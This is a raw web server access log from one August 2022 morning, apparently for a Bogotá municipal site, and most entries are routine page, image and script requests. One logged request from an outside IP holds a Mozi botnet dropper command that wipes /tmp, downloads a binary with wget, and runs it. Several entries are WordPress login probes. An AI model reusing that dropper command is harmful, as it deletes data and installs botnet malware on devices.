172.22.2.4 - - [25/Aug/2022:06:20:11 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [25/Aug/2022:06:20:11 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [25/Aug/2022:06:20:21 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [25/Aug/2022:06:20:21 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [25/Aug/2022:06:20:21 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [25/Aug/2022:06:20:21 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [25/Aug/2022:06:19:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:06:21:01 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [25/Aug/2022:06:21:01 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [25/Aug/2022:06:21:01 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [25/Aug/2022:06:21:01 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [25/Aug/2022:06:21:01 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [25/Aug/2022:06:21:01 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [25/Aug/2022:06:21:06 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 401765
120.85.117.156 - - [25/Aug/2022:06:21:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 1018
172.22.2.4 - - [25/Aug/2022:06:19:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44034
172.22.2.4 - - [25/Aug/2022:06:20:11 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 40907
216.245.221.92 - - [25/Aug/2022:06:21:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:06:22:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
181.61.206.56 - - [25/Aug/2022:06:23:47 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.61.206.56 - - [25/Aug/2022:06:23:47 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.61.206.56 - - [25/Aug/2022:06:23:47 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [25/Aug/2022:06:23:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
185.119.81.105 - - [25/Aug/2022:06:25:17 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [25/Aug/2022:06:25:18 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [25/Aug/2022:06:24:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [25/Aug/2022:06:26:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:06:25:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
207.46.13.186 - - [25/Aug/2022:06:27:29 -0500] "GET /Publicaciones/2022EE20499.pdf HTTP/1.1" 404 227
201.245.192.253 - - [25/Aug/2022:06:28:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
201.245.192.253 - - [25/Aug/2022:06:29:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43627
201.245.192.253 - - [25/Aug/2022:06:29:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40343
216.245.221.92 - - [25/Aug/2022:06:31:58 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.36 - - [25/Aug/2022:06:32:06 -0500] "GET /BLA/resoluciones/870.tif HTTP/1.1" 404 1018
172.22.2.4 - - [25/Aug/2022:06:30:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:06:31:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
201.245.192.253 - - [25/Aug/2022:06:33:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:06:33:08 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 62763
216.245.221.92 - - [25/Aug/2022:06:36:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:06:37:06 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2004%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 304 -
172.22.2.4 - - [25/Aug/2022:06:36:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:06:38:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:06:37:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [25/Aug/2022:06:39:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43627
201.245.192.253 - - [25/Aug/2022:06:39:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40343
172.22.2.4 - - [25/Aug/2022:06:39:52 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%203%20del%2005%20de%20abril%20de%202013.pdf HTTP/1.1" 304 -
31.13.115.24 - - [25/Aug/2022:06:40:50 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
31.13.103.6 - - [25/Aug/2022:06:40:51 -0500] "GET /images/eficiencia-energetica-11-marzo.jpg HTTP/1.1" 200 46478
66.249.73.191 - - [25/Aug/2022:06:41:58 -0500] "-" 408 -
216.245.221.92 - - [25/Aug/2022:06:41:58 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:06:43:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:06:42:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
159.223.237.60 - - [25/Aug/2022:06:44:29 -0500] "HEAD / HTTP/1.1" 200 -
159.223.237.60 - - [25/Aug/2022:06:44:29 -0500] "GET /wp-login.php HTTP/1.1" 404 1199
159.223.237.60 - - [25/Aug/2022:06:44:29 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 404 1199
159.223.237.60 - - [25/Aug/2022:06:44:30 -0500] "GET /blog/wp-login.php HTTP/1.1" 404 1199
159.223.237.60 - - [25/Aug/2022:06:44:30 -0500] "GET /wp/wp-login.php HTTP/1.1" 404 1199
172.22.2.4 - - [25/Aug/2022:06:43:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [25/Aug/2022:06:46:58 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.80 - - [25/Aug/2022:06:47:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/869.tif HTTP/1.1" 200 65368
207.46.13.11 - - [25/Aug/2022:06:47:34 -0500] "GET /Autoliquidacion/Grupo%20Forestal%20-%20Silvicultura/Formulario%20de%20solicitud%20de%20manejo%20o%20aprovechamiento%20forestal.xlsx HTTP/1.1" 304 -
186.102.56.157 - - [25/Aug/2022:06:48:09 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX190szdKYu0LdvrcV702Dk5VHlzFjT+uqD31kUyXlmTXUd/4nJH0cLOV&y=U2FsdGVkX1+bclF5QfyGHHPtRTseQC9KbhKolUZyJFHUyN0Oibk8sMKTXohhYeIs HTTP/1.1" 200 30
186.102.56.157 - - [25/Aug/2022:06:48:09 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/7A6ihoj1L05sAgnwMqJRd7zjh+qeYY7vodHT1vp2Gtafk3jfYGvk8d/xAUhK37B03nUNJZZ3reFPYBWKjunHbpSimNHPbhIM=&u=U2FsdGVkX19N0ibdXjOgu0Azz+nAyhbDzWwowprZ1OAO3e31U32twPfq4oAKDj20&y=U2FsdGVkX1+bclF5QfyGHHPtRTseQC9KbhKolUZyJFHUyN0Oibk8sMKTXohhYeIs HTTP/1.1" 200 97
186.102.56.157 - - [25/Aug/2022:06:48:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19sBNxmCere+phMT1W8P85IeoI/8B0SM4UUND0oYlQkT7PmFsmocP4D5LiWO2qAxNZIM26VWDhCDM67kKtoFBuhA5tNMcJlprlEvDp2FqfcN+oqVf5Ku2MuAZGNeLOdPMnNv2L+6cwtAs9xYDD/wXVUuhpb/vQbuV+k5hcyH2yR60QuQLl+4pvSdjIm7WXmQvdbBXWQsO0GiKjf3GdJhmGCFta7h77PEnKHhnE34FMGYFlPT9EzwPpNJQPn58vxgduJ7efrjVwLRUVYeI0qxph/mRSesMPqN8szNVOmeJcLaYj3W3Kl2EvtfqrLm192LSugRfFLTKygsP0AhUIw0+kKXgJeveUq+mrpToFZApnMuBiZ6XAyxpCU6uNjsEL0Dt9GupjAOXRWN0gnbv1KliuHNowl5D7w7TMQ1ttr8/pC9L1Cln9vsaXn0IXgEhhu7MUhyKjvlXH1CpRla4sGJWCD184XuFpFE+3HqB2fh61XHYwalhGbC1eFLnyqIdKFr4+cfl40vjISHZdKZYIkaS58Btqwl1r1JOWxSBHpdCyCv8h7if4uYCJh68V0ZsvLGzhpIzQFpCXdmmslPdgew0eWMXzef4zfn1siPQeHuKNa4y1PG9Gmvwx0dYyqxQPEqH3FXGSgQgN7CQmvzQhXFBnrDrh4apgsMaM+hFm1TVc07aS9oxatZg5GtZ5RSEYAIkHeVQRU0+EdWXD8VmNjf19tiWjbClxaY3mNK236b2mbDf0acY8C0uZQOMd2fhT6ksrVmkGnJTP5VT2n+5nqiIgOcQFCURSGgReL8uTmalfXo7AbFbiFvyjCQE+j4ZliALTFyNnFJXvFAW8O30/Yj303zx/W3IoMkJkujKuJBIXCTZ034mvPKbvtXerTUCff4WUs0OllbGsPJC6hmTiJzKctb1mPRo4ZXeO/r1vo8DLVsbnD+wlrirtq0qr/7cN/vT2nrD+dUoPzUsHjxZXw4drVr0VYf+Ifg+X6YP2IhdSuEzD3QTGylfjDcffdRV0dSXejI7rXRT1EvRPJw2VSpTU8kzFVSpWYEBVUJEPbG3jwsW9LprxJejbFFU/MLlhlOvIFx/zJUcD3YKCWaY04eC0bXJ6dcnnj/rjju7spamoalrd7pV2YvxrZc+KzDWCHnDBumXyxRHn6HGASJc+HY9BIm7iTVr1LdbMWw57xomDUz9BntNRbRjj4GPg1lwRIglqHy+cHEp9wT/hUOarj1EuaPz2ByY8L9d2SbrbiD0onWHBw8nSbCjVl2qCshS+lhYh7M0JM+tmWMMDFwUKIY9vySNBgDYW1b9bm2ZljiwE68Fhucrv+ovw5mEtdRFayUu2yIjPmUAqgEhVRDawtEXOwUfOJygjZPB4=&u=U2FsdGVkX19N0ibdXjOgu0Azz+nAyhbDzWwowprZ1OAO3e31U32twPfq4oAKDj20&y=U2FsdGVkX1+bclF5QfyGHHPtRTseQC9KbhKolUZyJFHUyN0Oibk8sMKTXohhYeIs HTTP/1.1" 200 1565
186.102.56.157 - - [25/Aug/2022:06:48:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18uoibF87/MFWhWb2oVq4ysCD3qBN6Z7xKN9hApkZy0uHRH08sWq9lUnJUWZ1CB2+QN6DzPbABIz4A4XwDJpw9uE2pz5+pcjyWT7FcN2+WjuV9BYLF3HAYvhum+YwWN739XWmYQEqKZIUgFQYzWKbh+YYMo7Fbai1BRaa8MyDYnKJVNEp2AscDreVG0ocJhZglmbtXGiYbGRMOJtqSjAX66qP2LOptuIGx4V05JftIpNAVrFO9BjRzlHkcTyO+GCvWXCb+4ly2s0x9HAJU8XgcMcXln7/6O7Wk=&u=U2FsdGVkX19N0ibdXjOgu0Azz+nAyhbDzWwowprZ1OAO3e31U32twPfq4oAKDj20&y=U2FsdGVkX1+bclF5QfyGHHPtRTseQC9KbhKolUZyJFHUyN0Oibk8sMKTXohhYeIs HTTP/1.1" 200 176
186.102.56.157 - - [25/Aug/2022:06:48:10 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX190szdKYu0LdvrcV702Dk5VHlzFjT+uqD31kUyXlmTXUd/4nJH0cLOV HTTP/1.1" 200 30992
201.245.192.253 - - [25/Aug/2022:06:48:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:06:48:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:06:49:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54814
172.22.2.4 - - [25/Aug/2022:06:50:53 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 304 -
216.245.221.92 - - [25/Aug/2022:06:51:58 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:06:53:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:06:52:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61965
172.22.2.4 - - [25/Aug/2022:06:54:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
186.80.52.18 - - [25/Aug/2022:06:55:49 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.80.52.18 - - [25/Aug/2022:06:56:13 -0500] "GET /catalogoisis/imagenes/aceptar2.gif HTTP/1.1" 200 586
186.80.52.18 - - [25/Aug/2022:06:56:14 -0500] "GET /catalogoisis/imagenes/limpiar2.gif HTTP/1.1" 200 589
172.22.2.4 - - [25/Aug/2022:06:54:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53281
186.80.52.18 - - [25/Aug/2022:06:56:17 -0500] "GET /catalogoisis/imagenes/click.gif HTTP/1.1" 200 398
172.22.2.4 - - [25/Aug/2022:06:54:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54347
216.245.221.92 - - [25/Aug/2022:06:56:58 -0500] "HEAD / HTTP/1.1" 200 -
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
186.80.52.18 - - [25/Aug/2022:06:57:23 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.80.52.18 - - [25/Aug/2022:06:57:31 -0500] "GET /catalogoisis/imagenes/limpiar2.gif HTTP/1.1" 200 589
172.22.2.4 - - [25/Aug/2022:06:58:30 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [25/Aug/2022:06:58:34 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [25/Aug/2022:06:58:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
181.237.245.141 - - [25/Aug/2022:07:00:09 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.237.245.141 - - [25/Aug/2022:07:00:09 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.237.245.141 - - [25/Aug/2022:07:00:09 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.237.245.141 - - [25/Aug/2022:07:00:09 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.237.245.141 - - [25/Aug/2022:07:00:09 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.237.245.141 - - [25/Aug/2022:07:00:09 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.237.245.141 - - [25/Aug/2022:07:00:20 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.237.245.141 - - [25/Aug/2022:07:00:22 -0500] "POST /appsia/controlador HTTP/1.1" 200 7781
181.237.245.141 - - [25/Aug/2022:07:00:23 -0500] "POST /appsia/controlador HTTP/1.1" 200 6646
181.237.245.141 - - [25/Aug/2022:07:00:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 11308
181.237.245.141 - - [25/Aug/2022:07:00:59 -0500] "POST /appsia/controlador HTTP/1.1" 200 7781
181.237.245.141 - - [25/Aug/2022:07:01:01 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.237.245.141 - - [25/Aug/2022:07:01:03 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
172.22.2.4 - - [25/Aug/2022:06:59:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [25/Aug/2022:07:01:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:07:00:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
92.118.39.88 - - [25/Aug/2022:07:03:03 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [25/Aug/2022:07:03:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
207.46.13.186 - - [25/Aug/2022:07:04:42 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera1G.jpg HTTP/1.1" 200 340987
216.245.221.92 - - [25/Aug/2022:07:06:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:07:05:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:07:06:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53281
201.245.192.253 - - [25/Aug/2022:07:08:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [25/Aug/2022:07:11:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:07:11:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:07:13:15 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 304 -
201.245.192.253 - - [25/Aug/2022:07:13:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:07:12:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51984
216.245.221.92 - - [25/Aug/2022:07:16:58 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.21 - - [25/Aug/2022:07:17:39 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 206 1025
69.171.251.10 - - [25/Aug/2022:07:17:40 -0500] "GET /images/pieza-mujeres-reverdecen-4-abril.jpg HTTP/1.1" 200 48916
201.245.192.253 - - [25/Aug/2022:07:18:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:07:17:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [25/Aug/2022:07:19:13 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
